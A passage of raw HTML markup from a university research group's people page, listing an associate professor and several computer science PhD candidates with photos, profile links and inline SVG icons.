29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 